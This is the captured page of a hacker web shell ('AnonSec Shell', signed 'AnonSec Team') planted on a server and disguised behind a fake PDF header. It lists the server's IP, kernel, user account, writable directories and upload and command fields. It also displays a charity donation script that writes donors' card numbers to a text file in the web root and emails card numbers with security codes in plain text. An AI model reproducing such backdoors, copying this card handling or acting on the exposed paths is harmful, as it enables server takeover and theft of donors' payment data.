%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/f/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/f/form_send_pro_yoni.php
<?php
setcookie("Name", $_POST['Name'], time()+2504800, "/"); 
setcookie("email", $_POST['email'], time()+2504800, "/"); 
setcookie("Address", $_POST['Address'], time()+2504800, "/"); 
setcookie("City", $_POST['City'], time()+2504800, "/"); 
setcookie("Zip", $_POST['Zip'], time()+2504800, "/"); 
setcookie("Country", $_POST['Country'], time()+2504800, "/"); 
setcookie("Phone", $_POST['Phone'], time()+2504800, "/"); 
setcookie("ICard", $_POST['ICard'], time()+2504800, "/"); 

session_start();  
if(isset($_SESSION['makor_mpde']))

// write form results to file
if (( $_POST['Name'] == "" ) || ($_POST['Payment_method'] == "")  || ($_POST['Card_Number'] == "")  || ($_POST['expmonth'] == "")  || ($_POST['expyear'] == "")  || ($_POST['Total'] == "") )
{
header( 'location:http://www.meirpanim.org/' );
 }
else {
	
 $fp = fopen("donations/trumot_f.txt", "a"); 
 fwrite($fp, $_POST['Name'] ."\t". $_POST['email']."\t". $_POST['Payment_method']."\t". $_POST['Card_Number']."\t". $_POST['expmonth']."\t". $_POST['expyear']."\t". $_POST['Number_of_payments']."\t". $_POST['Total']. "\r\n");
 fclose($fp);
 
if ( $_POST['email'] != "" )
{
 $fp = fopen("donations/form-results_f.txt", "a"); 
 fwrite($fp, $_POST['email'] . "\r\n");
 fclose($fp);
 }

// send form results through email 
$MPreffers = $_POST['MPreffers'];

if ( $_POST['USAD/EURO/NIS'] == "CAD $" ) {
	$recipient = "canadaoffice@meirpanim.org";
} else {
	$recipient = "donations@meirpanim.org";
}

if ( $MPreffers == judy ) {
	$subject = "Donation from Meir panim new site F - JUDY";
} else {
	$subject = "Donation from Meir panim new site F";
}


//$subject = "Donation from Meir panim website E";
if ( $_POST['MPbanner'] != "" )
{$Banner = " --- Banner: " .$_POST['MPbanner']  ;}

if ( $_POST['unlisted'] != "" )
{$unlisted = "Unlisted: " .$_POST['unlisted']."\r\r"  ;}
if ( $_POST['UK_Increase_your_gift'] == "Yes" )
{$UK_Increase_your_gift = "UK Increase your gift by 28%: " .$_POST['UK_Increase_your_gift']."\r\r"  ;}
if ( $_POST['How_Did_You_Find_Us'] != "" )
{$hdyfu = "How Did You Find Us: " .$_POST['How_Did_You_Find_Us']."\r"  ;}
if ( $_POST['In_Honor_of'] != "" )
{$iho = "In Honor of: " .$_POST['In_Honor_of']."\r"  ;}
if ( $_POST['In_Memory_of'] != "" )
{$imo = "In Memory of: " .$_POST['In_Memory_of']."\r"  ;}
if ( $_POST['acknowledgement_name'] != "" )
{$ack_name = "Acknowledgement name: " .$_POST['acknowledgement_name']."\r"  ;}
if ( $_POST['acknowledgement_street'] != "" )
{$ack_st = "Acknowledgement street: " .$_POST['acknowledgement_street']."\r"  ;}
if ( $_POST['acknowledgement_city'] != "" )
{$ack_city = "Acknowledgement city: " .$_POST['acknowledgement_city']."\r"  ;}

if ( $_POST['acknowledgement_Country'] != "" )
{$ack_count = "Acknowledgement Country: " .$_POST['acknowledgement_Country']."\r"  ;}
if ( $_POST['acknowledgement_email'] != "" )
{$ack_mail = "Acknowledgement Email: " .$_POST['acknowledgement_email']."\r"  ;}
if ( $_POST['Relationship'] != "" )
{$ack_relat = "Relationship: " .$_POST['Relationship']."\r"  ;}
if ( $_POST['acknowledgement_occasion'] != "" )
{$ack_occ = "Acknowledgement occasion: " .$_POST['acknowledgement_occasion']."\r"  ;}
if ( $_POST['acknowledgement_date'] != "" )
{$ack_date = "Acknowledgement date: " .$_POST['acknowledgement_date']."\r"  ;}
if ( $_POST['Comments'] != "" )
{$comm = "Comments: " .$_POST['Comments']. "\r" ;}
$forminfo = 
("Reffers: " .$_POST['MPreffers'] . $Banner . "\r\r" .
"Title: " .$_POST['Title'] . "  " ." Name: " .$_POST['Name'] . "\r\r" .
"Email: " .$_POST['email'] . "\r\r" .
"Address: " .$_POST['Address'] . "\r\r" .
"City: " .$_POST['City'] .   "  ".   "  " . "State: " .$_POST['State']  .    "  " ."  ".
"Zip: "  .$_POST['Zip']  . "\r\r" .
"Country: "  .$_POST['Country']  . "\r\r" .
"Phone: "  .$_POST['Phone']  .  " " ." --- " .
"ICard: "  .$_POST['ICard']  . "\r\r" .
"Payment method: "  .$_POST['Payment_method']  . "\r\r" .
"Card Number: "  .$_POST['Card_Number']  ." --- code: "  .$_POST['Card_Security_Code']. "\r\r" .
"Exp: "  .$_POST['expmonth']  . "   " .
$_POST['expyear']  . "\r\r" .
"Amount of payment: "   .$_POST['Amount_of_payment']  . "\r\r" .
"Number of payments: "  .$_POST['Number_of_payments']  . "\r\r" .
$unlisted.
"Total: "  . $_POST['USAD/EURO/NIS']." "  .$_POST['Total']  . "\r\r" .
$UK_Increase_your_gift.
$hdyfu. 
$iho. 
$imo. 
$ack_name. 
$ack_st. 
$ack_city. 
$ack_count.
$ack_mail.
$ack_relat.
$ack_occ. 
$ack_date. 
$comm. 
$_SERVER["HOST_NAME"]."---".$_SERVER['REMOTE_ADDR'].
"--- ". $_SERVER['HTTP_REFERER'].
"\r\n" );

$formsend = mail("$recipient", "$subject", "$forminfo", "From: $email\r\nReply-to:$recipient");

// send confirmation to donor by email
$header = "Merci pour votre généreux don. Un reçu imprimé vous sera envoyé après enregistrement de votre don.
Voici la transcription de votre transaction. Conservez-la soigneusement.";
$sender = "donations@meirpanim.org";
$recipient = $email;
$subject = "Confirmation de votre don à Meir Panim";
if ( $_POST['Number_of_payments'] != "1" )
{$nop = "Number of payments: " .$_POST['Number_of_payments']."\r\n"  ;}
if ( $_POST['unlisted'] != "" )
{$unlisted = "Unlisted: " .$_POST['unlisted']."\r"  ;}
if ( $_POST['How_Did_You_Find_Us'] != "" )
{$hdyfu = "How Did You Find Us: " .$_POST['How_Did_You_Find_Us']."\r"  ;}
if ( $_POST['In_Honor_of'] != "" )
{$iho = "In Honor of: " .$_POST['In_Honor_of']."\r"  ;}
if ( $_POST['In_Memory_of'] != "" )
{$imo = "In Memory of: " .$_POST['In_Memory_of']."\r"  ;}
if ( $_POST['acknowledgement_name'] != "" )
{$ack_name = "Acknowledgement name: " .$_POST['acknowledgement_name']."\r"  ;}
if ( $_POST['acknowledgement_street'] != "" )
{$ack_st = "Acknowledgement street: " .$_POST['acknowledgement_street']."\r"  ;}
if ( $_POST['acknowledgement_city'] != "" )
{$ack_city = "Acknowledgement city: " .$_POST['acknowledgement_city']."\r"  ;}
if ( $_POST['acknowledgement_Country'] != "" )
{$ack_count = "Acknowledgement Country: " .$_POST['acknowledgement_Country']."\r"  ;}
if ( $_POST['acknowledgement_email'] != "" )
{$ack_mail = "Acknowledgement Email: " .$_POST['acknowledgement_email']."\r"  ;}
if ( $_POST['Relationship'] != "" )
{$ack_relat = "Relationship: " .$_POST['Relationship']."\r"  ;}
if ( $_POST['acknowledgement_occasion'] != "" )
{$ack_occ = "Acknowledgement occasion: " .$_POST['acknowledgement_occasion']."\r"  ;}
if ( $_POST['acknowledgement_date'] != "" )
{$ack_date = "Acknowledgement date: " .$_POST['acknowledgement_date']."\r"  ;}
if ( $_POST['Comments'] != "" )
{$comm = "Comments: " .$_POST['Comments']. "\r" ;}

$forminfo = 
($header . "\r\r" .$_POST['Title'] . " " . $_POST['Name'] . "\r" .
$_POST['email:'] .$_POST['email'] . "\r" .
"Address: " .$_POST['Address'] . "\r" .
"City: " .$_POST['City'] .   "\r" .
"State: ". $_POST['State']  . "\r" .
"Zip: "  .$_POST['Zip']  . "\r" .
"Country: "  .$_POST['Country']  . "\r" .
"Phone: "  .$_POST['Phone']  . "\r" .
"Amount of payment: "  .$_POST['Amount_of_payment']  . "\r" .
$nop. 
$unlisted.
"Total: "  . $_POST['USAD/EURO/NIS'] ." "  .$_POST['Total']  . "\r" .
$iho. 
$imo. 
$ack_name. 
$ack_st. 
$ack_city. 
$ack_count.
$ack_mail.
$ack_relat.
$ack_occ. 
$ack_date. 
$comm. "\r\n"
."www.meirpanim.org". "\r\n" );

$formsend = mail("$recipient", "$subject", "$forminfo", "From: $sender\r\nReply-to:$sender");
    unset($_SESSION['makor_mpde']);//delete session
}

else
header( 'location:http://form_abuse.php/' );
?>

Anon7 - 2022
AnonSec Team